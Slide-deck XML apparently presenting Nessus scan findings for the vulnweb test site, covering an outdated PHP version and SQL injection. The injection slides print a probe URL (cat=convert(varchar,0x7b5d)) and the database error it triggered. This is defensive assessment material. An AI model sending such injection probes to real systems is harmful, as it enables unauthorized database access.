                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.2 or later.</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264" name="Google Shape;264;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403281" y="3944996"/>
            <a:ext cx="548700" cy="365700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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265" name="Google Shape;265;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9498690" y="3944971"/>
            <a:ext cx="548700" cy="3657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266" name="Google Shape;266;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11238738" y="3944971"/>
            <a:ext cx="548700" cy="3657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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660544" y="927027"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP 5.x &lt; 5.2.2 Multiple vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660544" y="1567107"/>
            <a:ext cx="9814560" cy="2491087"/>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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Version source     : http://testphp.vulnweb.com/secured/phpinfo.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>  Installed version  : 5.1.6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>  Fixed version      : 5.2.2</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id="73" name="Google Shape;73;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="68579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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538624" y="909610"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>12. CGI Generic SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="278" name="Google Shape;278;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>By providing specially crafted parameters to CGIs, Nessus was able to get an error from the underlying database. This error suggests that the CGI is affected by a SQL injection vulnerability.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:b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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                  HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An attacker may exploit this flaw to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.</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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>modify the relevant CGIs so that they properly escape arguments.</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279" name="Google Shape;279;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7184571" y="3039291"/>
            <a:ext cx="600891" cy="452846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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280" name="Google Shape;280;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9213669" y="3039291"/>
            <a:ext cx="600891" cy="452846"/>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281" name="Google Shape;281;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10929257" y="3039291"/>
            <a:ext cx="600891" cy="452846"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677961" y="927028"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252549" y="1567108"/>
            <a:ext cx="11652068" cy="5077532"/>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333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Using the GET HTTP method, Nessus found that : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The following resources may be vulnerable to SQL injection : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'cat' parameter of the /listproducts.php CGI : /listproducts.php?cat=convert(varchar,0x7b5d) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;!-- InstanceBeginEditable name="content_rgn" --&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div id="content"&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'varchar,0x7b5d)' at line 1 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Warning: mysql_fetch_array() expects parameter 1 to be resource, b [...] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/div&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Clicking directly on these URLs should exhibit the issue : (you will probably need to read the HTML source) http://testphp.vulnweb.com/listproducts.php?cat=convert(varchar,0x7b5d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590481" y="874776"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>13. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic SQL Injection (2nd pass)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="293" name="Google Shape;293;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>By providing specially crafted parameters to CGIs, Nessus was able to get an error from the underlying database. This error suggests that the CGI is affected by a SQL injection vulnerability.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:b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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
